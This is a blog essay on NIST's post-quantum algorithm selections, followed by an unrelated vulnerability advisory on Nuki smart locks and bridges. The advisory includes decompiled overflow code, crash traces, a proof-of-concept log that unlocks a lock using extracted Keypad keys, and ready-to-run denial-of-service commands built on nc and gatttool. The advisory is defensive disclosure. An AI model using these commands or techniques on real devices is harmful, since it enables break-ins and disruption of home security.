NIST is adamant that the standardization project is not a competition, though it sure has some competitive flavour, with candidates, rounds and finalists. The call was for two algorithm categories: key encapsulation mechanisms (KEMs) and signatures, to be used in situations where we currently use, typically, Diffie-Hellman key exchange over some elliptic curve, and ECDSA or EdDSA, respectively. They received no fewer than 69 complete submissions! It was then followed by the usual winnowing process in which some of the weakest candidates were quickly broken, or withdrawn; other candidates found that they were so similar to each other that they could be merged. NIST organized several “rounds”, each time selecting some algorithms for the next round, and rejecting others. Their choice was informed by all comments and research papers that flourished about the candidates, though there cannot be a ultimately completely rational and unimpeachably logical “best candidate”, since security relies on predictions on future discoveries in mathematics. We are, at best, in the “educated guess” area in these matters. NIST had to perform a delicate balancing act between the known results, an informal estimation of how well we understand the underlying mathematical objects, performance and secure implementation issues, and their own goal of achieving some extra diversity in the kind of problems upon which the algorithms rely. NIST wrote an extensive status report that details the retained and not retained algorithms, and their rationale.

Round 3 is now finished, and some algorithms were selected for standardization:

  • The KEM algorithm CRYSTALS-Kyber
  • The signature algorithms CRYSTALS-Dilithium, Falcon, and SPHINCS+

Having a single KEM algorithm does not fulfill the diversity goal of NIST; indeed, a “round 4” has started with four remaining KEM candidates: BIKE, Classic McEliece, HQC and SIKE. The declared intent is to select at least one of these at the end of round 4. Conversely, no other signature algorithm was selected for round 4, so we have to assume that NIST feels content with the three selected algorithms, or, more accurately, that they did not find the remaining candidates to offer a sufficient mix of security and performance. A footnote in the NIST status report (note 7, page 19) states that NIST intends to issue a new call for post-quantum signatures before the end of 2022.

CRYSTALS-Kyber and CRYSTALS-Dilithium are two facets of a common mathematical problem, which is the difficulty of finding small vectors in a given lattice. The algorithms use module lattices and can share some parts of their implementations. The CRYSTALS Web site offers some summary and pointers to the specification and some implementations. NIST, very correctly, noticed that the two algorithms were based on strong science, a reasonably simple design, and allowed easy implementation with good performance. A slight issue might be about intellectual property: footnote 6 in the report (page 18) ominously states that some agreements are currently being discussed with some owners of patents that may apply to Kyber, and if these agreements cannot reach a satisfying conclusion by the end of 2022 then NIST might replace Kyber with NTRU, another former candidate and also one of the first proposed lattice-based algorithms. NIST strongly intends that any standardized algorithm may be used and implemented freely.

Falcon is also a lattice-based algorithm, though a slightly different kind of lattice. Disclaimer: I am part of the Falcon team (thus, I am technically one of the “winners” of the not-a-competition). Falcon uses an NTRU lattice, though in a somewhat convoluted way (see the Falcon Web site for details). Since it is lattice-based, it does not bring much diversity beyond Dilithium; NIST selected it for performance reasons: Falcon public keys and signatures are substantially shorter than Dilithium keys and signatures. For instance, Falcon offers public keys of size 897 bytes, and signatures of size 666 bytes, while Dilithium starts at 1312-byte keys and 2420-byte signatures. In the common situation of a TLS connection, the server sends its public key as part of a chain of X.509 certificates, and each certificate include both a public key, and a signature value; thus, the larger size of both values in Dilithium translates to more IP packets to send, which noticeably increases connection latency in experiments. This makes Falcon quite desirable in that kind of contexts. Unfortunately, while Falcon signature verification is relatively easy to implement, and fast, signature generation is a lot more complicated and very hard to implement securely. To my knowledge, apart from the Python demo implementation by Thomas Prest (who led the Falcon submission team), all existing implementations of Falcon are derivative of the reference code, which I wrote with some considerable effort. Falcon was, by far, the most complicated cryptographic algorithm I have ever implemented; this was at least one order of magnitude harder than, say, anything related to elliptic curves. I also got it wrong the first time. NIST recommends Dilithium by default, reserving Falcon for situations where the shorter keys and signatures yield important benefits; I fully agree with NIST here.

SPHINCS+ is a hash-based signature scheme. This is the conservative choice, whose security is completely unrelated to lattices, but instead relies on fairly basic properties of hash functions, so that we feel that we understand quite well why they work, and why they are not at risk at being broken in the near future (though, to be fair, we do not really know, mathematically speaking, whether secure hash functions can exist at all!). As the other algorithms, SPHINCS+ has its own Web site. SPHINCS+ performance is not so good, as is usual with hash-based signature schemes: public keys are very small (32 bytes at the base security level), but signatures are quite large (at least 7856 bytes). It must be noted that SPHINCS+ is a stateless scheme; there are other standardized stateful hash-based schemes (e.g. XMSS and LMS) which offer somewhat smaller signatures, but require the signer to maintain some state that changes for each produced signature. In general, such hash-based schemes are adequate in situations such as an embedded system verifying a cryptographic signature on its firmware image whenever it boots up.

What next? The standardization process will continue. NIST will proceed to draft standards for CRYSTALS algorithms, then for Falcon and SPHINCS+; there may be some cosmetic adjustments on the algorithms at that point. The standard-writing and approval steps are not faster than anything else in the whole process, so we should not expect formally published standards before at least a year from now. Non-lattice KEMs are still being investigated (three code-based schemes, and one using isogenies between supersingular elliptic curves). Outside of the PQC process, science still works and new proposals are made; e.g. the recently proposed BAT is a lattice-based KEM using a Falcon-like lattice, but without requiring the cumbersome floating-point computations, and offering smaller keys and ciphertext than CRYSTALS-Kyber.

Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)

25 July 2022 at 08:30

The following vulnerabilities were found as part of a research project looking at the state of security of the different Nuki (smart lock) products. The main goal was to look for vulnerabilities which could affect to the availability, integrity or confidentiality of the different devices, from hardware to software.

Eleven vulnerabilities were discovered. Below are links to the associated technical advisories:

Technical Advisories:

Lack of Certificate Validation on TLS Communications (CVE-2022-32509)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32509

Risk: 8.5 (CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:N)

Summary

No SSL/TLS certificate validation was implemented on the Nuki Smart Lock and Bridge devices.

Impact

Without SSL/TLS certificate validation, it is possible to perform man-in-the-middle attacks to access network traffic sent over an encrypted channel.

Details

It was possible to set up an intercepting proxy to capture, analyse and modify communications between the affected device and the supporting web services. In the picture below, WebSocket traffic can be observed, in which messages are sent to and received from the Keyturner device:

Keyturner WebSocket traffic captured

Recommendation

Implement SSL/TLS certificate validation for every function that uses network communication.

Stack Buffer Overflow Parsing JSON Responses (CVE-2022-32504)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32504

Risk: 8.8 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

The code that implements the parsing of the JSON objects received from the SSE WebSocket leads to a stack buffer overflow.

Impact

A skilled attacker would be able to exploit this to gain arbitrary code execution on the device.

Details

The code shown in the snippet below leads to a buffer overflow. It should be noted that the C code below is an interpretation based on firmware decompilation. Therefore, the structure, pointers, variables, etc. can differ from the original one.

void ws_parse_response()
{
  // stack variables
  [SNIP]
  char name_value[40];
  unsigned __int8 item_buff[1024]; // destination buffer (overflowed)
  json_list json_obj;
  unsigned int v22[3]; 
  _BYTE *v23;
  [SNIP]

  packet_val_len = 0;
  byte_2000B007 = 1;
  sub_698EA(v22);

  num_json_items = json_parser(v22, ws_pkt_received, ws_pkt_recv_size, &json_obj, 0x20u);
  if ( num_json_items >= 0 )
  {
    for ( i = 0; i < num_json_items; ++i )
    {
      if ( !json_obj_strcmp(ws_pkt_received, &json_obj.obj[i], "name") ) // name item
      {
        sprintf( item_buff, "%.*s", json_obj.obj[i + 1].end - json_obj.obj[i + 1].ini,
          &ws_pkt_received[json_obj.obj[i + 1].ini]); // overflow
        strncpy(name_value, item_buff, 40);
        break;
      }
      if ( !json_obj_strcmp(ws_pkt_received, &json_obj.obj[i], "id") ) // id item – line 37
      {
        sprintf( item_buff, "%.*s", json_obj.obj[i + 1].end - json_obj.obj[i + 1].ini,
          &ws_pkt_received[json_obj.obj[i + 1].ini]); // overflow – line 40
        strncpy(v18, item_buff, 32);
        dword_2000AD7C = sub_768BC(v18, 0, 10);
      }
    }
    ++word_2000AD64;
    print_log("SSE: received %s\r\n", name_value);
  • The code above is parsing the SSE WebSocket JSON packet received.
  • The code looks for the “id” key. (line: 37)
  • The selected key’s value (e.g. “id”) is copied into the stack variable “item_buff” (1024 bytes) through the sprintf() function. (line: 40)
  • The variable is overflowed since no size checks are implemented.

The snippet of code below shows how the stack buffer overflow was triggered and the PC (Program Counter) ARM register overwritten:

[*] ==========================
[*] Emulating the ws_parse_response() function
>>> Function: ['00069D08 (ws_parse_response)'] (lr:0x0)
>>> Function: ['00075A06 (memset)'] (lr:0x69d21)
>>> Function: ['00075A06 (memset)'] (lr:0x69d31)
>>> Function: ['00075A06 (memset)'] (lr:0x69d41)
>>> Function: ['000698EA (sub_698EA)'] (lr:0x69dbb)
>>> Function: ['000695B4 (json_parser)'] (lr:0x69dd7)
[SNIP]
>>> Function: ['000759D4 (sub_759D4)'] (lr:0x7701f)
>>> Function: ['0007652E (strncpy_)'] (lr:0x69edb)
>>> Function: ['000768BC (sub_768BC)'] (lr:0x69ee9)
>>> Function: ['000767A4 (sub_767A4)'] (lr:0x768db)
>>> Function: ['0007588C (sub_7588C)'] (lr:0x767bf)
>>> Function: ['00069926 (print_log)'] (lr:0x69f1f)
>>> Function: ['00076580 (sub_76580)'] (lr:0x69f27)
>>> Function: ['00069926 (print_log)'] (lr:0x69f33)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x69f3f)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a0bb)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a2a9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a395)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a7f9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6a9a9)
>>> Function: ['000764D6 (strcmp_)'] (lr:0x6b079)
>>> Tracing basic block at 0x58585858, block size = 0x4
==============================
ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
>>> r0 = 0xffffffb5
>>> r1 = 0xc9b85
>>> r2 = 0x1
>>> r3 = 0x2000ad68
>>> sp = 0x20005300
>>> pc = 0x58585858

It should be noted that all sprintf() functions implemented within the vulnerable function could lead to stack buffer overflows since the  “item_buff” stack variable’s size is not checked.

It should also be mentioned that this vulnerability in combination with the “Lack of Certificate Validation on TLS Communications” greatly increases the risk of both vulnerabilities. An attacker could carry out a man-in-the-middle attack between the device and the router in order to tamper with the WebSocket packets, trigger the buffer overflow vulnerability and finally take control of the device.

Additionally, if a malicious user could get access to the Nuki’s SSE servers this could be used to take control of all the affected devices.

Recommendation

Ensure that the length of the data copied into an object is checked in order to avoid exceeding the size of its destination or the desired value. Always specify the size of the destination buffer for any memory copy operation to prevent overflowing it. This can be achieved by using the snprintf() function instead of the sprintf() function.

All code should be compiled with standard defensive measures in place. Stack cookies could be enabled to prevent stack buffer overflows.

Stack Buffer Overflow Parsing HTTP Parameters (CVE-2022-32502)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32502

Risk: 8.0 (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Summary

The code in charge of the HTTP API parameter parsing logic leads to a stack buffer overflow.

Impact

A skilled attacker could be able to exploit this to gain arbitrary code execution.

Details

Stack overflows can be exploited by overwriting a function return address thereby gaining control of execution. In the context of the affected device, the lack of common protections against stack manipulation, such as stack canaries or ASLR, makes it easier to successfully exploit this vulnerability.

The following C pseudocode (obtained from decompiling the firmware) shows how the HTTP API parses the parameters received when the timestamp parameter is supplied:

int sub_FDA8(char *http_ts_param, int http_rnr_param, char *http_token_param, char *http_hash_param)
{
  [SNIP]
  char v22[64]; // [sp+28h] [bp-D8h]
  char string_to_hash[30]; // [sp+68h] [bp-98h]

  sprintf(string_to_hash, "%s,%d,%s", http_ts_param, http_rnr_param, http_token_param);
  v5 = sub_45AAA(string_to_hash);
  sub_12B00((int)string_to_hash, v5, (int)v21);
  sub_214BC(v22, (int)v21);
  [SNIP]

The first line of code to be executed concatenates the timestamp parameter with the random number and clear-text token. This corresponds to how the hashed token is calculated, according to the HTTP API documentation[1] (section 3.2.1). This is done with a call to sprint(), that copies the contents of said parameters to the stack-based buffer “string_to_hash”. However, this call if performed without validating parameter size, leading to an overflow.

Sending a large payload in the “ts” parameter is enough to crash the device, causing a restart. Upon inspection, it was confirmed that the return address was overwritten:

Return address overwritten abusing the “ts” parameter

It is important to notice that this vulnerability is exploitable from within the LAN network, without the need of a valid token, as long as the HTTP API is enabled.

[1] Nuki HTTP API documentation: https://developer.nuki.io/page/nuki-bridge-http-api-1-13/4/#heading–token

Recommendation

Ensure that the length of the data copied into an object is checked in order to avoid exceeding the size of its destination or the desired value. Always specify the size of the destination buffer for any memory copy operation to prevent overflowing it. This can be achieved by using the snprintf() function instead of the sprintf() function.

All code should be compiled with standard defensive measures in place. Stack cookies could be enabled to prevent stack buffer overflows.

Broken Access Controls in the BLE Protocol (CVE-2022-32507)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32507

Risk: 8.0 (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

Summary

Insufficient access controls were found in the Bluetooth Low Energy (BLE) Nuki API implementation.

Impact

The lack of access controls allowed users to send high-privileged commands to the Keyturner for which they should not have permission.

Details

It was found that some BLE commands, which should have been designed to be only called from privileged accounts (such as the mobile application) could also be called from unprivileged accounts (such as the Keypad). This demonstrates that no access controls were implemented for the different BLE commands between the different accounts.

Therefore, the Keypad authentication (auth-id and shared-key) could be used to call the “Lock Action”[1] command, which does not require the Keypad code, instead of the “Keypad Action”[2] command. This would allow an attacker with access to the Keypad auth-id and shared-key to carry out actions such as opening the Keyturner without knowing the Keypad code.

Similarly, an attacker could also try to change the Keyturner admin security PIN from an unprivileged user account by using its authentication information and calling the BLE command “Set Security PIN”.

The snippets of code below show how it was possible to use the Keypad authentication data (auth-id and shared-key) to call the Lock Action command and open the Keyturner without knowing the Keypad code.

Keypad authentication data, which can be extracted by using the exposed JTAG/SWD interfaces:

# Auth ID   # Name (Nuki Keypad)
0x000f4e00: 00000000e15c3400034e756b69204b6579706164000000000000000000000000
0x000f4e20: 0000000000000000005c7927013dbcac2f3f91e2[REDACTED]2ff141a6afa51a // shared key
0x000f4e40: 84dc6e49a016fee464e5070101040a08e5070101040a08000000000000000000 // (32 bytes)

A python script was developed to perform the “Lock Action” command with the Keypad auth data:

$ python keyturner_open.py 
[*] == Nuki Keyturner Protocol == [*]
[*] SHARED_KEY: 5c7927013dbcac2f3f91e2[REDACTED]2ff141a6afa51a84dc6e49a016fee464
[*] PACKET 1 (keyturner > keypad)
[*] ========================================
[*] packet: 0fb7d032f45f7252738500eb19e2[REDACTED]96f771f821c80b26752343329a5ddc8b2ef3bdb414
[*] nonce:  0fb7d032f45f7252738500eb19e2bc546fac8d1f057816d8
[*] auth_id:  e15c3400
[*] len:  1a00
[*] ##########
[*] Plaintext: e15c340001000400752d
[*] auth_id:   e15c3400
[*] command:   Request Data (0100)
[*] payload:   Challenge (0400)
[*] crc:       752d
[*] ========================================
[*] PACKET 2 (keypad > keyturner)
[*] ========================================
[*] packet: 4f9ab198f1c0b011f3d17b327d8160[REDACTED]2279658a4939a1578c088ceafa1c3a56f32be2f08
[*] nonce:  4f9ab198f1c0b011f3d17b327d8160506c146bc3535cfbb9
[*] auth_id:  e15c3400
[*] len:  3800
[*] ##########
[*] Plaintext: e15c34000400e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c24c28
[*] auth_id:   e15c3400
[*] command:   Challenge (0400)
[*] payload:   e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c2
[*] crc:       4c28
[*] ========================================
[*] PACKET 3 (keyturner > keypad)
[*] ========================================
[*] packet: 14b78e7ddb716c95e988d655ad245b9[REDACTED]4a8c0948670186b389615e3c01f9756232b8835ce
[*] nonce:  14b78e7ddb716c95e988d655ad245b99f1c8292cd1066f93
[*] auth_id:  e15c3400
[*] len:  3e00
[*] ##########
[*] Plaintext: e15c34000d00010000000000e33eeb8c4f5a9df1af6ecce7edacd28b0c92149[REDACTED]245ec
[*] auth_id:   e15c3400
[*] command:   Lock Action (0d00)
[*] payload:   010000000000e33eeb8c4f5a9df1af6ecce7edacd28b0c92149c665b543b50b2fc49630fd4c2
[*] crc:       45ec
[*] ========================================
[*] PACKET 4 (keypad > keyturner)
[*] ========================================
[*] packet: 4e9887b2e14fee9070ceec172b1f1fd99[REDACTED]4c26bdcbc2df6cfcddc24ff9941fdcea8f378
[*] nonce:  4e9887b2e14fee9070ceec172b1f1fd99eb4e9e52b60081d
[*] auth_id:  e15c3400
[*] len:  1900
[*] ##########
[*] Plaintext: e15c34000e0001f3a4
[*] auth_id:   e15c3400
[*] command:   Status (0e00)
[*] payload:   01
[*] crc:       f3a4
[*] ========================================
  • Packet 1: The script requests a challenge – Request Data (0100) + Challenge (0400)
  • Packet 2: Keyturner replies with a valid challenge – Challenge (0400)
  • Packet 3: The script requests the “Lock Action” appending the valid challenge – Lock Action (0d00)
  • Packet 4: Keyturner replies with the “Status (0e00)” message – Unlocked successfully

It should be mentioned that this vulnerability in combination with the “JTAG Exposed via Test Points” exposes the Nuki environment to considerable risk as the Keypad is usually installed on an untrusted place. Hence, an attacker could leverage these vulnerabilities to open the Keyturner without knowing the Keypad code.

[1] https://developer.nuki.io/page/nuki-smart-lock-api-2/2/#heading–lock-action

[2] https://developer.nuki.io/page/nuki-smart-lock-api-2/2/#heading–keypad-action

Recommendation

Access controls must be implemented for the different accounts and BLE commands.

Similarly, ensure that the access controls, which should be applied to each function, are fully understood and are implemented correctly. [1][2]

[1] OWASP Guidance: https://owasp.org/www-community/Broken_Access_Control

[2] OWASP Top 10 – Broken Access Control: https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A5-Broken_Access_Control

JTAG Exposed via Test Points (CVE-2022-32503)

Vendor: Nuki (https://nuki.io)Systems and Versions affected:
- Nuki Keypad (<1.9.2)
- Nuki Fob (<1.8.1)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32503
Risk: 7.6 (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Summary

JTAG hardware interfaces were exposed on the affected devices.

Impact

An attacker with physical access to the circuit board could use the JTAG’s boundary scan feature to control the execution of code on the processor and debug the firmware, as well as read or alter the content of the internal and external flash memory.

Details

The circuit board exposes a JTAG interface on PCB through-hole test points, as shown below:

Keypad JTAG exposed and labelled interface

This interface was next to a set of labels that clearly indicated each pad functionality, making it easier to take advantage of.

The snippet of code below shows the ARM registers once connected into the JTAG interface:

> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0x00000004
(2) r2 (/32): 0x40030000
(3) r3 (/32): 0x00000005
(4) r4 (/32): 0x40090000
(5) r5 (/32): 0x40030000
(6) r6 (/32): 0x00000009
(7) r7 (/32): 0x50001000
(8) r8 (/32): 0x40091000
(9) r9 (/32): 0x40090000
(10) r10 (/32): 0x00000001
(11) r11 (/32): 0x40031000
(12) r12 (/32): 0xffffffff
(13) sp (/32): 0x11001ff0
(14) lr (/32): 0x10000eb1
(15) pc (/32): 0x10000e62
(16) xPSR (/32): 0x61000000
(17) msp (/32): 0x11001ff0
(18) psp (/32): 0x00000000
(20) primask (/1): 0x00
(21) basepri (/8): 0x00
(22) faultmask (/1): 0x00
(23) control (/3): 0x00
===== Cortex-M DWT registers

An attacker with physical access to any of these ports may be able to connect to the device and bypass both hardware and software security protections. JTAG debug may be usable to circumvent software security mechanisms, as well as to obtain the full firmware stored in the device unencrypted.

The severity of this issue has been raised to high, as the Keypad device is exposed outside of the secured area, making it easier for an attacker to access the device and its internal components.

Recommendation

NCC Group recommends disabling JTAG using the appropriate means described in the point 5.1 of the “Technical Reference Manual for the CC26x0 MCU”[1].

[1] https://www.ti.com/lit/ug/swcu117i/swcu117i.pdf?ts=1647438101993  

Sensitive Information Sent Over an Unencrypted Channel (CVE-2022-32510)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32510

Risk: 7.1 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)

Summary

The HTTP API exposed by the Bridge used an unencrypted channel to provide an administrative interface.

Impact

Communications between a client and the HTTP API could be passively collected by any other device with access to the local network.

Details

By design[1], a client authenticates to the API using a parameter named “token” supplied in GET requests, as shown below:

GET /info?token=[REDACTED] HTTP/1.1
Host: 192.168.254.100:8080
User-Agent: curl/7.68.0
Accept: */*
Connection: close

This token can be easily eavesdropped by a malicious actor to impersonate a legitimate user and gain access to the full set of API endpoints.

It should also be noted that the API provides a method to obfuscate the authentication token along with other parameters. The documentation states that a SHA256 hash is calculated consisting of the concatenation of the timestamp, a random four-digit number, and the plaintext token. The request above would be replaced by something similar to the one below:

GET /info?ts=2022-01-19T11:24:01Z&rnr=1245&hash=4b110d8fa77359c7814e0e73d19d94b8e57c7ea9de3d996fce9d6dfdf106f610 HTTP/1.1
Host: 192.168.254.100:8080
User-Agent: curl/7.68.0
Accept: */*
Connection: close

This protection provided by the mentioned method is not enough to prevent the leak of the authentication token. All the other variables used to calculate the hash are known to the attacker and knowing the token length and its character set, it would be possible to crack it with little effort.

As a proof of concept, the hash used in the previous request was cracked using hashcat[2] at 224 a MH/s rate in less than four minutes:

Hashed token cracked

[1] Nuki Bridge HTTP API Documentation: https://developer.nuki.io/page/nuki-bridge-http-api-1-13/4/#heading–token

[2] Hashcat Cracking Tool: https://hashcat.net/hashcat/

Recommendation

HTTP connections should be replaced with HTTPS using TLS 1.2/1.3.

Additionaly, no sensitive information, such as the authentication token, should ever be sent in an HTTP GET parameter. Consider using POST messages or adding an authentication cookie.

SWD Interfaces Exposed via Test Points (CVE-2022-32506)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32506

Risk: 6.4 (CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

Summary

SWD hardware interfaces were exposed on the affected devices.

Impact

An attacker with physical access to the circuit board could use the SWD debug features to control the execution of code on the processor and debug the firmware, as well as read or alter the content of the internal and external flash memory.

Details

The system-on-a-chip (SoC) exposes a SWD interface on the tests points shown below:

SWD test points exposed

The SWD interface pinout is documented in the SoC datasheet[1] (section 6.3, page 130; section 6.5, page 162) and  was exploited using the following configuration:

Functionality GPIO name Pin number
SWCLK PF0 Pin 1
SWDIO PF1 Pin 2

An attacker with physical access to this interface would be able to connect to the device and bypass both hardware and software security protections. SWD debug could be used to circumvent software security mechanisms, as well as obtain the full unencrypted firmware stored in the device.

The snippet of code below shows how it was possible to interact with the SoC, to display the ARM registers:

===== Cortex-M DWT registers
> halt
target halted due to debug-request, current mode: Thread 
xPSR: 0x61000000 pc: 0x0002d652 msp: 0x20002100
> reg
===== arm v7m registers
(0) r0 (/32): 0x00000000
(1) r1 (/32): 0xffffffff
(2) r2 (/32): 0x00000000
(3) r3 (/32): 0x2000567c
(4) r4 (/32): 0x20005674
(5) r5 (/32): 0x2000e064
(6) r6 (/32): 0xffffffff
(7) r7 (/32): 0x00000000
(8) r8 (/32): 0x20005108
(9) r9 (/32): 0x20005118
(10) r10 (/32): 0x20006624
(11) r11 (/32): 0x00000000
(12) r12 (/32): 0x00000004
(13) sp (/32): 0x20002100
(14) lr (/32): 0x00025413
(15) pc (/32): 0x0002d652
(16) xPSR (/32): 0x61000000
(17) msp (/32): 0x20002100
(18) psp (/32): 0x20010000
(20) primask (/1): 0x00
(21) basepri (/8): 0x00
(22) faultmask (/1): 0x00
(23) control (/3): 0x00
[SNIP]

[1] https://www.silabs.com/documents/public/data-sheets/efr32mg13-datasheet.pdf

Recommendation

NCC Group recommends disabling SWD using the GPIO API described in “EFR32 Mighty Gecko 13 Software Documentation”[1]

[1] https://siliconlabs.github.io/Gecko_SDK_Doc/efr32mg13/html/group__GPIO.html#ga7aa21d660197b3e2f67589db89686bbf

Denial of Service via Unauthenticated HTTP API Messages (CVE-2022-32508)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Bridge v1 (<1.22.0)
- Nuki Bridge v2 (<2.13.2)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32508

Risk: 6.5 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Summary

The affected devices were vulnerable to denial of service via crafted HTTP packets.

Impact

An unauthenticated attacker could cause a denial of service, affecting the availability of the Bridge by making the device unstable.

Details

The following python command can be used in order to reproduce the denial of service attack:

$ python -c 'print(b"XXX / HTTP/1.1\r\nHost:10.0.0.103\r\n\r\n")' | nc BRIDGE_IP 8080
HTTP/1.1 405 Method not allowed
Connection: Close
Content-Length: 27

HTTP 405 Method not allowedHTTP/1.1 405 Method not allowed
Connection: Close
Content-Length: 27

HTTP 405 Method not allowed

As shown in the HTTP response above, after sending the crafted HTTP message, the API server returned three consecutive “405 Method not allowed” message responses and rebooted.

The image below shows how after sending the crafted HTTP packet, the device was rebooted and requested a new IP address through the DHCP protocol. Note that the payload was sent twice, at seconds 48 and 86.

DHCP packets sent after the DoS

It should also be mentioned that this behaviour was investigated in the firmware, but the root cause could not be confirmed. Observations suggested that HTTP messages which did not have a valid “GET” method, where not being handled correctly leading to an infinite loop.

Recommendation

It is recommended to investigate the issue and try to identify the root cause.  

Denial of Service via Unauthenticated BLE packets (CVE-2022-32505)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Smart Lock 2.0 (<2.12.4)

Authors:
- Daniel Romero: [email protected]
- Pablo Lorenzo: [email protected]
- Guillermo Del Valle Gil: [email protected]

CVE Identifier: CVE-2022-32505

Risk: 6.5 (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Summary

The affected devices were vulnerable to denial of service(DoS) via crafted Bluetooth Low Energy (BLE) packets.

Impact

An unauthenticated attacker could cause a DoS, affecting to the availability of the Keyturner and making the device unstable.

Details

The following bash command can be used in order to reproduce the denial of service attack: (This command can be sent a few times in a row to ensure the DoS)

$ gatttool -b KEYTURNER_MAC --char-write-req -a 0x69 -n $(echo -ne "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" |xxd -ps)
connect error: Function not implemented (38)

Apart from observing the Keyturner reboot sounds and the engines turning, the device reboot was also verified by adding hardware breakpoints into the first firmware function (0x250f6) through the SWD interface:

> bp 0x250f6 2 hw
breakpoint set at 0x000250f6
> resume
> 
>  // Denial of Service was done here
> 
target halted due to breakpoint, current mode: Thread 
xPSR: 0x61000000 pc: 0x000250f6 msp: 0x200052ec  // breakpoint triggered, so device was rebooted
>

It should be mentioned that most of the BLE characteristics exposed and those undefined within the documentation seem vulnerable to the same issue.

The snippets of code below show characteristics found with write properties for the Keyturner v2 and v3.

Keyturner v2 characteristics with write properties:

Handles Service > Characteristics Properties
0008 -> 000b
000c
0011
000000a20000100080000026bb765291 
000000370000100080000026bb765291
     000000a50000100080000026bb765291

READ, WRITE
READ, WRITE
0016 -> 0044
001a
001f
0024
0029
002e
0033
0038
003d
0000003e0000100080000026bb765291
     000000140000100080000026bb765291               
000000200000100080000026bb765291
000000210000100080000026bb765291
000000230000100080000026bb765291
000000230000100080000026bb765291
000000520000100080000026bb765291
000000530000100080000026bb765291
000000a60000100080000026bb765291
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
READ, WRITE
